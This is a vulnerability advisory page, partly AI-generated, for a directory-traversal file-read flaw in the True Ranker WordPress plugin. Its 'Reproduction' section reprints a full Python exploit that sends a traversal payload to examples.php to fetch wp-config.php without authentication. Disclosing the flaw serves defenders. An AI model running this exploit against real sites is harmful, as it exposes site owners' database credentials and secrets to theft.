True Ranker <= 2.2.2 Directory Traversal/Arbitrary File Read
Description
The True Ranker plugin <= 2.2.2 for WordPress allows arbitrary files, including sensitive configuration files such as wp-config.php, to be accessed via the src parameter found in the ~/admin/vendor/datatables/examples/resources/examples.php file.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Affected products
2- Range: <=2.2.2
- True Ranker/True Rankerv5Range: 2.2.2
Patches
Vulnerability mechanics
Root cause
"The plugin fails to sanitize user-supplied input in the `src` parameter, allowing for directory traversal."
Attack vector
An unauthenticated attacker can exploit this vulnerability by sending a POST request to the `examples.php` file within the plugin's directory. The request must include a crafted `src` parameter containing a path traversal sequence, such as `../../../../../../../../../wp-config.php`, to access sensitive files on the server [ref_id=1]. The vulnerability is present in versions up to and including 2.2.2 of the True Ranker plugin [ref_id=1].
Affected code
The vulnerability resides in the `~/admin/vendor/datatables/examples/resources/examples.php` file, specifically where the `src` parameter is processed without proper sanitization. This allows for arbitrary file reads, including sensitive files like `wp-config.php` [ref_id=1].
What the fix does
The advisory does not specify a patch or provide details on how the vulnerability is fixed. Remediation guidance suggests updating the plugin to a version that addresses this issue. Users should consult the vendor for specific patch information or updated versions.
Preconditions
- authThe vulnerability is unauthenticated.
- inputThe attacker must be able to send a POST request to the vulnerable endpoint.
Reproduction
```python #!/usr/bin/env python3
import argparse, textwrap import requests import sys
parser = argparse.ArgumentParser(description="Exploit The True Ranker plugin - Read arbitrary files", formatter_class=argparse.RawTextHelpFormatter) group_must = parser.add_argument_group('must arguments') group_must.add_argument("-u","--url", help="WordPress Target URL (Example: http://127.0.0.1:8080)",required=True) parser.add_argument("-p","--payload", help="Path to read [default] ../../../../../../../../../../wp-config.php", default="../../../../../../../../../../wp-config.php",required=False)
args = parser.parse_args()
if len(sys.argv) <= 2: print (f"Exploit Usage: ./exploit.py -h [help] -u [url]") sys.exit()
HOST = args.url PAYLOAD = args.payload
url = "{}/wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php".format(HOST) payload = "/scripts/simple.php/{}".format(PAYLOAD)
r = requests.post(url,data={'src': payload}) if r.status_code == 200: print(r.text) else: print("No exploit found") ``` [ref_id=1]
Generated on Jun 4, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
3- packetstormsecurity.com/files/165434/WordPress-The-True-Ranker-2.2.2-Arbitrary-File-Read.htmlmitrex_refsource_MISC
- plugins.trac.wordpress.org/browser/seo-local-rank/tags/2.2.2/admin/vendor/datatables/examples/resources/examples.phpmitrex_refsource_MISC
- www.wordfence.com/vulnerability-advisories/mitrex_refsource_MISC
News mentions
0No linked articles in our index yet.